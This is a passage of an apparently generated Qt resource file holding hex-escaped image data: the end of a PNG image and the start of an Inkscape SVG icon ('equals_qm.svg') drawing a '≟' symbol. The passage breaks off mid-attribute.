\xa7\xec\xfc\x24\x43\x83\x5b\xd9\xb5\xfd\x3e\x86\x07\x36\x81\xca\
\x1f\x33\x25\x5e\x87\xab\x38\xe4\x08\xaa\x00\xe1\xe8\x71\x3d\xe6\
\x6e\x0e\xa7\x02\xbb\x82\x15\x4a\xbe\xbc\x2d\x5c\xfc\x52\x2c\x21\
\x91\x52\xf3\xc5\xbd\x70\x75\xbc\xaf\x32\x5c\xf9\xe2\xed\x30\xe2\
\xc9\x03\x65\x65\x18\xea\xdf\xcc\x8e\x57\xbe\xc3\xe0\xfe\x17\xfd\
\x99\x5f\x2d\x00\x0e\x94\x01\x07\x02\x30\x8f\x26\x78\xa6\x73\xd8\
\xfe\xcd\xc7\xb6\x04\x40\xb8\xbb\x73\x44\x02\x4c\x2f\x6c\x2d\x2f\
\x8a\x8e\x01\x15\x85\x05\x1d\x77\xfd\xbf\x70\xef\x32\xbe\x64\x93\
\x26\x81\x7b\x7a\xb4\xd0\xb0\xac\x49\x86\xfb\x37\xb3\xb3\xf3\x5e\
\x86\x07\x5e\x42\x60\x21\xa4\x9c\x96\x01\x65\x1e\xc9\x1f\x69\x62\
\x78\x4d\xd3\xb4\xd0\xf3\x16\xc2\xfe\xbe\x63\x12\x00\xbe\x5e\x0f\
\xce\x34\x7f\xdf\x70\x02\x33\x1a\x84\xf4\xf4\x7b\xe1\xec\x78\x81\
\x40\xc8\x29\xce\x8b\x15\xb8\xb1\xfd\x4d\x74\xbd\x72\x0f\x43\xfd\
\x2f\x96\x89\xfd\x6a\xcf\x48\xf8\x63\x48\x80\xb0\x67\x07\xcf\x70\
\x0a\xdb\xbe\xff\x60\x41\x70\x44\x4b\xc3\x3c\x7f\x3c\xf8\x7f\xfb\
\xb5\xfe\x45\x4c\x02\x43\x17\xa4\x9a\x35\x0c\xc3\x99\xb9\x96\x0d\
\x7d\xfd\x36\x96\x7b\x7e\x84\xae\x43\xba\x45\xc7\xd0\x05\xb9\xbc\
\x62\xdf\xfe\x3c\xd9\x4c\x96\xa1\xfe\x4d\xec\x7c\xe5\xdb\x4c\x8e\
\x6d\xe3\xc4\x85\x27\x60\x9a\xce\x96\xae\xd9\x6c\x96\xb7\xde\x7a\
\x8b\x6c\x36\x8b\x10\x02\xd3\x34\x69\x6f\x6f\x27\x12\x71\x24\x52\
\x26\x93\xf1\xfb\x01\x0c\xc3\xa0\xbd\xbd\x1d\xd3\x34\xc9\x66\xb3\
\xec\xd9\xb3\xa7\x28\x83\xd8\x34\x4d\xe6\xce\x9d\x1b\x3a\xbe\xd7\
\x1f\x36\x7e\x2e\x97\xab\xd8\x1f\x7c\x46\xa5\x33\x98\x0e\x16\x04\
\x47\xb6\x36\xd0\x17\xeb\xa2\x38\x14\x5c\x12\x05\x46\x08\xd2\x2d\
\x1a\x0f\xdc\x35\xab\x68\xa6\xfc\xed\xe7\x7a\xe8\xde\x67\x21\x84\
\x20\xd9\x28\xf9\xde\x9d\x85\x1a\x84\x4f\xac\xde\xc3\xf6\xce\x4d\
\xec\xd8\x76\x0f\xc3\x03\x2f\x31\xff\x84\xb9\x6c\xdb\xb6\xad\xe8\
\xf1\xa7\x9f\x7e\xba\x5f\x10\xd2\xd1\xd1\xc1\xd6\xad\x5b\xcb\xfa\
\xbb\xba\xba\x00\xa7\xbe\xa1\xb3\xb3\xd3\xff\xb1\x97\x2c\x59\xe2\
\xf7\x79\xf4\x61\xe3\x7b\xdf\x99\x37\x6f\x1e\x5b\xb6\x14\x97\x8f\
\x9d\x71\xc6\x19\x53\xf6\x7b\xf4\x61\xa7\xb2\x78\xbf\x43\x70\x4b\
\xfe\xd2\x83\x3c\xaa\x91\x5c\x47\xb8\xa4\xb5\x10\xaa\xf5\x8f\x02\
\x0f\x5c\xc2\xcd\xdf\x33\x74\x41\xaa\x45\x47\x08\xc1\x2d\x6b\xfa\
\xb9\xf9\x4e\x27\xf1\x23\xdd\xa2\x13\x31\x9d\x90\xef\xc8\x98\xe2\
\x53\x5f\xec\xe5\x5f\xbe\xe9\x1c\x54\x9d\x19\xdf\xce\xce\xce\x7f\
\x65\x74\xe8\x65\xa2\x11\x9d\x79\xf3\xe6\x21\x84\xe0\x83\x1f\xfc\
\x20\x97\x5f\x7e\x39\x42\x08\xe6\xcd\x9b\x47\x3c\x1e\x27\x1e\x8f\
\xfb\x05\x28\x97\x5f\x7e\x39\x97\x5f\x7e\xb9\xcf\xd4\x58\x2c\x86\
\xa6\x69\x0c\x0c\x0c\x70\xe6\x99\x67\x72\xcd\x35\xd7\x20\x84\x20\
\x1e\x8f\xfb\xc7\xea\x46\xa3\x51\x3a\x3a\x3a\x42\xc7\x4f\x24\x12\
\x24\x12\x09\xbf\xff\xca\x2b\xaf\xe4\xca\x2b\xaf\x44\x08\x41\x47\
\x47\x47\xd9\xf3\xaf\xb8\xe2\x8a\xa2\xe7\x47\xa3\x51\xff\x18\xdf\
\xe0\x71\xbe\x52\x4a\xbf\x88\xd6\xbb\xf7\x5e\x4b\xd5\xca\x54\x6a\
\xe8\x88\x7a\x01\xc5\x7f\x98\xa8\x08\x91\x54\x8b\xc6\x1d\x37\xa4\
\xf8\x5f\xb7\xef\xe7\xd5\xae\x2c\x02\xb8\xf1\x6b\xfd\xdc\xfe\xcf\
\x29\xfe\xee\x0b\xbd\xf4\xf4\x59\xd8\x16\xec\xeb\xb3\x30\x35\x47\
\xa4\xee\x7d\xe3\x51\x86\x07\x36\x21\xb0\x98\x37\x6f\x21\xbf\xf8\
\xc5\x2f\xb8\xe4\x92\x4b\xd8\xb8\x71\x23\x00\x97\x5e\x7a\x29\x4f\
\x3e\xf9\x24\xcb\x97\x2f\x07\xe0\xc9\x27\x9f\xe4\xd2\x4b\x2f\xf5\
\x33\x9a\xbd\xfe\x65\xcb\x96\xb1\x63\xc7\x0e\xf2\xf9\x3c\xbb\x76\
\xed\x22\x1a\x75\x96\x9c\x3d\x46\x00\x9c\x70\xc2\x09\x6c\xd8\xb0\
\x61\xda\xf1\x2f\xbb\xec\x32\x7f\xfc\xcb\x2e\xbb\x8c\x9f\xff\xfc\
\xe7\x9c\x7d\xf6\xd9\x80\xb3\x15\x8d\xd7\xaf\x94\xf2\xe9\xcf\x3a\
\xeb\x2c\x5f\x0a\x04\x0f\xe7\x92\x52\xfa\xef\x4b\x8f\xe3\x99\x2a\
\x85\xac\xb4\xef\x88\x97\x87\x57\x42\xa8\xf7\x91\x00\x4c\xc3\x41\
\xf6\xf0\xa8\x4d\x2e\x87\x7f\xef\xe8\x4e\xe1\x0b\x0d\xdb\xca\x32\
\x32\xf4\x06\xd0\xce\xd8\xe8\x1f\x90\xc2\x06\x77\x86\x02\xf4\xf7\
\xf7\xfb\x3a\xd7\x3b\xd2\x3e\x16\x8b\xf9\xcf\x1c\x18\x18\xf0\xfb\
\xbd\x32\xb1\x58\x2c\xe6\x1f\x7d\xa3\x94\xf2\xef\xbd\xd9\x08\x1c\
\xf4\xf8\xa5\xfd\x4a\xa9\xb2\xe7\x07\x99\x5e\xfa\x5a\xca\xf8\xa9\
\xec\x82\xd2\xbe\xa3\x7a\x83\x08\xef\x00\x11\x21\x02\xd1\x01\x51\
\x60\xb8\x07\x14\x29\x41\x59\x59\x86\x07\x36\x31\xde\xfd\x33\xe0\
\x42\x04\xb6\x3f\x43\x3d\x46\x05\xc5\x64\xf0\x28\x9b\x20\x53\x4b\
\x69\x3c\x31\x5f\xaa\x5f\xc3\xbe\x1b\x36\x7e\x50\x2c\x87\xd1\x84\
\xf5\x97\x02\x4d\xd3\xb4\x22\x2f\xc0\xb2\xac\x50\x10\x48\x29\xa7\
\x3c\xd7\x29\x0c\x04\xc7\xd4\x0e\x21\xa5\x80\xf0\x00\xa0\xec\x2c\
\x43\x03\x2f\xb3\x6b\xfb\x7d\xcc\x4a\x8d\x95\x49\x96\x30\x06\x04\
\x19\x51\x0d\x53\xbd\x1f\x33\x8c\x6e\xaa\xf1\xa7\x02\x5b\xd8\x38\
\x95\xfa\x3d\x46\x97\xde\x97\x8a\xf7\x30\x83\x70\x2a\x10\x1c\xf5\
\xfb\x9a\x08\x01\xf9\xbc\xf3\x0f\x34\x36\x68\x98\x3a\x98\x06\x34\
\x36\x48\xdf\xdd\x72\x72\xf8\xee\x63\x64\x70\x33\xc2\xcd\x29\x08\
\x1a\x4d\x9e\xd8\x4d\xa7\xd3\x44\xa3\x51\x62\xb1\x18\xa9\x94\x53\
\x81\x94\xcf\xe7\xc9\xe7\x9d\xbc\xbf\x54\x2a\x45\x34\x1a\x25\x1a\
\x8d\xfa\xfd\xb9\x5c\xae\x68\x56\x97\x32\x6b\x26\xe3\xa7\xd3\x69\
\x62\xb1\x18\xf1\x78\xdc\x2f\x7a\xb1\x2c\xab\xac\x3f\xf8\xfc\x6c\
\x36\x8b\x94\x92\x48\x24\xe2\xbb\x89\x42\x08\xff\xbd\x69\x9a\xfe\
\x7b\xcf\x0d\x2d\x55\xab\x95\x8c\x40\x21\xc4\xd1\x09\x00\x51\x12\
\xdb\xe9\x1f\xb4\xf8\xe7\xaf\xf6\xf1\x95\x2f\x15\xab\x9a\xbc\x00\
\x00\x04\x2c\x49\x44\x41\x54\xb6\x70\xfa\xa9\x26\x4b\x4e\x31\xb9\
\xed\x73\x2d\xdc\x7c\x67\x37\x5d\x6f\xbe\xc4\xee\x3f\xdc\xc7\xe4\
\x58\x27\xf3\x4f\x98\xcb\x82\x05\x0b\x00\x58\xb0\x60\x01\x0b\x16\
\x2c\x20\x12\x89\xd0\xd3\xd3\xc3\x15\x57\x5c\xc1\x8f\x7f\xfc\x63\
\xce\x3f\xff\x7c\xce\x3b\xef\x3c\x9e\x78\xe2\x09\x56\xae\x5c\x49\
\x4f\x4f\x0f\xdd\xdd\xdd\x5c\x75\xd5\x55\xac\x5f\xbf\x9e\xf3\xce\
\x3b\x8f\xf3\xce\x3b\x8f\xf5\xeb\xd7\x73\xd5\x55\x57\xd1\xd3\xd3\
\xe3\xff\xc0\x0b\x17\x2e\x3c\xa8\xf1\xd7\xad\x5b\xc7\xb9\xe7\x9e\
\xcb\x39\xe7\x9c\xc3\xe3\x8f\x3f\xce\xd5\x57\x5f\x4d\x77\x77\x37\
\xdd\xdd\xdd\x5c\x7d\xf5\xd5\x7e\xbf\xf7\xfc\x95\x2b\x57\xd2\xdb\
\xdb\x8b\x10\x82\xf6\xf6\x76\xb6\x6c\xd9\x42\x7b\x7b\x3b\x42\x08\
\xe6\xce\x9d\xcb\x6b\xaf\xbd\xe6\x7b\x17\x1d\x1d\x1d\x74\x75\x75\
\xf9\xde\x44\xb5\x20\x38\x26\x54\x40\x2e\x07\xfb\xfb\x9d\x64\x8e\
\x5b\x56\xb5\xf8\x9f\xef\xe8\xda\xc6\xeb\x9b\xef\x65\x64\x70\x33\
\xb3\x67\xa5\xf8\xfd\xef\x7f\xef\xf7\x79\xe5\x5b\xcb\x97\x2f\x67\
\xef\xde\xbd\x74\x77\x77\x03\x4e\x79\x99\xd7\xba\xbb\xbb\xc9\x64\
\x32\x08\x21\xfc\xfe\x87\x1f\x7e\xb8\xa8\xdf\x0b\xc4\xa4\x52\x29\
\x9e\x7d\xf6\xd9\x19\x8f\xef\xd1\x87\x8d\xbf\x77\xef\x5e\x32\x99\
\x8c\x7f\x5f\xa9\xbf\x94\x91\xd3\xb9\x76\xa5\x27\xc0\x4f\xa5\x0e\
\x8e\x58\x52\x68\x5d\xc3\xc9\x9c\xf9\xae\xfb\x48\x34\x9e\x14\xe2\
\xbb\x16\x5e\x85\x1b\xe6\xd7\x0d\x68\x6d\xd1\x31\x0d\x81\x52\x59\
\x06\xf7\x77\xf2\xe2\x33\xdf\xa2\xaf\x77\x23\x02\x0b\xd3\x34\x69\
\x6b\x6b\xf3\x45\xa4\x52\x8a\x4c\x26\xc3\xde\xbd\x7b\xc9\xe5\x72\
\x44\x22\x11\xda\xda\xda\x30\x0c\x03\x21\x04\xb9\x5c\x8e\xb7\xdf\
\x7e\x9b\x5c\x2e\xe7\x47\x02\xbd\x7e\x4f\xf4\x7b\x91\x3c\xa5\x14\
\xa6\x69\x32\x7b\xf6\x6c\x3f\xd2\xe7\x45\xeb\xf6\xee\xdd\x4b\x36\
\x9b\x9d\xd1\xf8\x42\x08\xb2\xd9\xac\x4f\xeb\x45\x02\xe7\xcc\x99\
\xe3\x3f\xdf\x8b\x24\x66\x32\x19\x6c\xdb\xc6\x30\x0c\x9a\x9b\x9b\
\xe9\xed\xed\x65\x72\x72\x12\x5d\xd7\x69\x69\x69\xf1\xdf\x1b\x86\
\x41\x3a\x9d\xa6\xa7\xa7\xc7\x07\x55\xd8\xb1\xbd\xc7\x04\x00\x7c\
\xe6\x3b\xab\xc6\xfe\xab\x14\x4e\xed\xde\xf0\xc0\x26\x76\x76\x7e\
\x87\x91\xc1\x97\xfd\xd8\x7e\xd8\xac\xa8\xf4\xbe\xf4\xb5\xda\x95\
\xc0\xe9\x8e\xd1\x9b\x6a\xfc\x6a\xc4\x71\x18\xb3\x4a\xcf\x64\x0e\
\xc6\x02\xa6\x3a\xb9\x7d\xaa\xbf\xfb\x98\x71\x03\xbd\x65\x01\x04\
\xa8\x7c\x86\x89\xc9\x6e\x26\xc6\x77\xb3\x67\xfb\xf7\x18\x1e\x74\
\x82\x3c\x95\x8e\xb9\xad\xf4\xe3\x96\xfa\xcb\xd3\x7d\x7f\x26\x0b\
\x42\x61\xe3\xcf\x64\x65\xb1\x94\x49\x61\x4c\x9d\x76\x46\xcf\x70\
\x6d\xe0\x98\xb0\x01\x9c\x15\xbd\x97\xd8\xb5\xfd\xdf\x98\x1c\xdf\
\x4d\x76\xb2\xc7\x67\x7e\xe9\x35\x1d\x10\x82\x4c\x9f\x8a\x29\x95\
\x4e\x4a\xaf\x76\x45\x6f\xba\xf1\xab\x91\x38\x40\xe8\xec\x9e\x0a\
\x98\x33\x5d\x18\x3a\xaa\x01\xa0\x70\x66\xfe\xe0\xfe\x17\xd9\xf1\
\xca\xb7\x18\xea\xdf\x84\x20\x57\x16\x70\x09\xf3\xf9\xa7\x13\xcf\
\xd5\x2c\xc5\xce\x64\x59\x78\xaa\xf1\x67\x9a\x4b\x30\x95\x24\x98\
\x4e\xdc\x1f\x5b\xab\x81\xd3\x88\x7e\x65\x67\x18\xdc\xff\x02\x5d\
\x5b\xbf\xc5\x50\xff\x0b\xa0\xf2\x7e\x80\xc4\x0b\x84\x4c\x65\x15\
\x57\xeb\x0b\x57\xc3\x88\xe9\x7e\xe4\x03\x19\x7f\xa6\x76\x47\x70\
\x25\xb0\xf4\x7e\x3a\xd5\x50\xe9\x7f\x38\x6a\x01\x60\x5b\x0e\xf3\
\xdf\xdc\xf2\x0d\x9f\xf9\xc1\xe5\xcf\xa9\x98\x5f\xad\xc1\x35\xd5\
\x77\xa6\x62\xf6\x4c\x44\xfb\x81\x00\x20\x0c\x78\x95\x8c\xc3\xe9\
\x8c\xbc\xe9\x0c\x57\xfd\x68\x65\xfe\x40\xdf\x0b\xbc\xb9\xe5\xeb\
\x0c\xf5\xbf\x80\x72\xb7\x67\xab\x64\x74\x4d\xa5\x7b\x0f\x96\x29\
\x07\x22\x5a\x0f\x55\xfa\xd8\x74\x86\xdf\x54\x33\xbe\x5a\xfb\x40\
\x3f\x9a\x99\x3f\xb8\x7f\xa3\xcf\xfc\xb0\x4c\x98\xa0\xa5\x7d\x38\
\x77\xd1\x38\xf2\xea\xb0\xf2\x8c\xae\xd6\x56\xa9\x04\x64\xfd\x68\
\x67\x7e\x98\x7b\x35\x93\x59\x7a\x38\x40\x50\x9c\xb4\xfa\xc7\x63\
\xfe\x74\xef\x67\xfa\xfb\x28\xa5\x8e\x1e\x00\x54\x62\x7e\x25\x1f\
\xbb\x34\x51\xf2\x50\x8a\xf0\xc3\xa5\x1a\x0e\x87\x34\x38\xd0\xbf\
\xef\xa8\x5a\x0e\x2e\x65\xbe\x77\xae\x6f\x25\xd7\xac\xd4\xdf\x9f\
\xce\x35\x7b\x27\xa9\x80\x43\x01\xc8\xa3\x2a\x12\x68\xdb\x19\x06\
\xfb\x5e\x2c\x63\xfe\x54\xa2\x36\x2c\xfa\x75\x34\xcd\xd2\x23\x0d\
\x86\x99\xd0\xeb\x47\x9a\xf9\x43\xfb\x5e\xe2\xcd\xad\xe5\xcc\xaf\
\x34\xeb\x8f\x17\x46\xff\xb1\x40\x73\xc4\x00\x60\x5b\x19\x06\xf6\
\xbf\x40\xef\xce\x9f\x32\xb8\xff\xc5\x50\xe6\xcf\x14\x08\x35\x46\
\x1f\x80\xcb\xca\x11\x5a\x0d\x94\xd2\xc4\x88\xa6\xc8\x4d\xf6\x39\
\xa7\x78\x1c\x82\x76\x2c\x83\xe3\x48\x49\xb1\x23\xb8\x4b\xd8\xe1\
\x79\xfc\xb1\x0a\x82\xe3\x14\x00\xb5\x76\xa4\x9b\xac\xfd\x04\x35\
\x00\xd4\x5a\x0d\x00\xb5\x56\x03\x40\xad\x1d\x97\xed\xff\x03\x44\
\xcc\x2a\x9e\xfe\x98\xe9\xac\x00\x00\x00\x00\x49\x45\x4e\x44\xae\
\x42\x60\x82\
\x00\x00\x0b\x40\
\x3c\
\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0a\x3c\x21\x2d\x2d\x20\x43\x72\x65\x61\x74\
\x65\x64\x20\x77\x69\x74\x68\x20\x49\x6e\x6b\x73\x63\x61\x70\x65\
\x20\x28\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x29\x20\x2d\x2d\x3e\x0a\
\x0a\x3c\x73\x76\x67\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\
\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\
\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\
\x2e\x31\x2f\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x63\x63\
\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x63\x72\x65\x61\x74\x69\x76\
\x65\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x6f\x72\x67\x2f\x6e\x73\x23\
\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\
\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\
\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\x23\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x76\x67\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3d\
\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\
\x72\x67\x2f\x32\x30\x30\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x6f\x64\x69\x70\x6f\x64\x69\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2e\
\x73\x6f\x75\x72\x63\x65\x66\x6f\x72\x67\x65\x2e\x6e\x65\x74\x2f\
\x44\x54\x44\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2d\x30\x2e\x64\
\x74\x64\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\
\x77\x2e\x69\x6e\x6b\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x6e\
\x61\x6d\x65\x73\x70\x61\x63\x65\x73\x2f\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x22\x0a\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x33\x32\
\x70\x78\x22\x0a\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x33\
\x32\x70\x78\x22\x0a\x20\x20\x20\x76\x69\x65\x77\x42\x6f\x78\x3d\
\x22\x30\x20\x30\x20\x33\x32\x20\x33\x32\x22\x0a\x20\x20\x20\x76\
\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x31\x22\x0a\x20\x20\x20\
\x69\x64\x3d\x22\x53\x56\x47\x52\x6f\x6f\x74\x22\x0a\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x76\x65\x72\x73\x69\x6f\x6e\
\x3d\x22\x30\x2e\x39\x32\x2e\x31\x20\x72\x22\x0a\x20\x20\x20\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x64\x6f\x63\x6e\x61\x6d\x65\x3d\
\x22\x65\x71\x75\x61\x6c\x73\x5f\x71\x6d\x2e\x73\x76\x67\x22\x3e\
\x0a\x20\x20\x3c\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x6e\x61\x6d\
\x65\x64\x76\x69\x65\x77\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\
\x62\x61\x73\x65\x22\x0a\x20\x20\x20\x20\x20\x70\x61\x67\x65\x63\
\x6f\x6c\x6f\x72\x3d\x22\x23\x66\x66\x66\x66\x66\x66\x22\x0a\x20\
\x20\x20\x20\x20\x62\x6f\x72\x64\x65\x72\x63\x6f\x6c\x6f\x72\x3d\
\x22\x23\x36\x36\x36\x36\x36\x36\x22\x0a\x20\x20\x20\x20\x20\x62\
\x6f\x72\x64\x65\x72\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x31\x2e\
\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\
\x3a\x70\x61\x67\x65\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x30\x2e\
\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\
\x3a\x70\x61\x67\x65\x73\x68\x61\x64\x6f\x77\x3d\x22\x32\x22\x0a\
\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x7a\x6f\
\x6f\x6d\x3d\x22\x31\x36\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x63\x78\x3d\x22\x32\x30\x2e\x33\x38\x34\
\x37\x34\x33\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x63\x79\x3d\x22\x31\x34\x2e\x39\x35\x33\x31\x32\x35\
\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\
\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2d\x75\x6e\x69\x74\x73\x3d\x22\
\x70\x78\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x3a\x63\x75\x72\x72\x65\x6e\x74\x2d\x6c\x61\x79\x65\x72\x3d\
\x22\x6c\x61\x79\x65\x72\x31\x22\x0a\x20\x20\x20\x20\x20\x73\x68\
\x6f\x77\x67\x72\x69\x64\x3d\x22\x66\x61\x6c\x73\x65\x22\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\
\x64\x6f\x77\x2d\x77\x69\x64\x74\x68\x3d\x22\x31\x39\x32\x30\x22\
\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\
\x69\x6e\x64\x6f\x77\x2d\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x31\
\x34\x31\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x78\x3d\x22\x30\x22\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\
\x64\x6f\x77\x2d\x79\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x6d\
\x61\x78\x69\x6d\x69\x7a\x65\x64\x3d\x22\x31\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x69\x64\x2d\
\x62\x62\x6f\x78\x3d\x22\x74\x72\x75\x65\x22\x20\x2f\x3e\x0a\x20\
\x20\x3c\x64\x65\x66\x73\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\
\x64\x65\x66\x73\x34\x34\x38\x35\x22\x20\x2f\x3e\x0a\x20\x20\x3c\
\x6d\x65\x74\x61\x64\x61\x74\x61\x0a\x20\x20\x20\x20\x20\x69\x64\
\x3d\x22\x6d\x65\x74\x61\x64\x61\x74\x61\x34\x34\x38\x38\x22\x3e\
\x0a\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x52\x44\x46\x3e\x0a\x20\
\x20\x20\x20\x20\x20\x3c\x63\x63\x3a\x57\x6f\x72\x6b\x0a\x20\x20\
\x20\x20\x20\x20\x20\x20\x20\x72\x64\x66\x3a\x61\x62\x6f\x75\x74\
\x3d\x22\x22\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\
\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x69\x6d\x61\x67\x65\x2f\x73\x76\
\x67\x2b\x78\x6d\x6c\x3c\x2f\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\
\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x79\
\x70\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\
\x66\x3a\x72\x65\x73\x6f\x75\x72\x63\x65\x3d\x22\x68\x74\x74\x70\
\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\x72\x67\x2f\x64\x63\x2f\x64\
\x63\x6d\x69\x74\x79\x70\x65\x2f\x53\x74\x69\x6c\x6c\x49\x6d\x61\
\x67\x65\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\
\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\x3c\x2f\x64\x63\x3a\x74\x69\
\x74\x6c\x65\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x63\x63\x3a\
\x57\x6f\x72\x6b\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\
\x52\x44\x46\x3e\x0a\x20\x20\x3c\x2f\x6d\x65\x74\x61\x64\x61\x74\
\x61\x3e\x0a\x20\x20\x3c\x67\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\
\x22\x6c\x61\x79\x65\x72\x31\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x6f\x75\x70\x6d\x6f\x64\x65\
\x3d\x22\x6c\x61\x79\x65\x72\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x6c\x61\x62\x65\x6c\x3d\x22\x45\x62\
\x65\x6e\x65\x20\x31\x22\x3e\x0a\x20\x20\x20\x20\x3c\x67\x0a\x20\
\x20\x20\x20\x20\x20\x20\x61\x72\x69\x61\x2d\x6c\x61\x62\x65\x6c\
\x3d\x22\x09\xe2\x89\x9f\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\
\x74\x79\x6c\x65\x3d\x22\x66\x6f\x6e\x74\x2d\x73\x74\x79\x6c\x65\
\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\x76\x61\x72\
\x69\x61\x6e\x74\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\
\x2d\x77\x65\x69\x67\x68\x74\x3a\x39\x30\x30\x3b\x66\x6f\x6e\x74\
\x2d\x73\x74\x72\x65\x74\x63\x68\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\
\x66\x6f\x6e\x74\x2d\x73\x69\x7a\x65\x3a\x34\x30\x70\x78\x3b\x6c\
\x69\x6e\x65\x2d\x68\x65\x69\x67\x68\x74\x3a\x31\x2e\x32\x35\x3b\
\x66\x6f\x6e\x74\x2d\x66\x61\x6d\x69\x6c\x79\x3a\x27\x53\x6f\x75\
\x72\x63\x65\x20\x43\x6f\x64\x65\x20\x50\x72\x6f\x27\x3b\x2d\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x2d\x66\x6f\x6e\x74\x2d\x73\x70\x65\
\x63\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x3a\x27\x53\x6f\x75\x72\
\x63\x65\x20\x43\x6f\x64\x65\x20\x50\x72\x6f\x20\x48\x65\x61\x76\
\x79\x27\x3b\x6c\x65\x74\x74\x65\x72\x2d\x73\x70\x61\x63\x69\x6e\
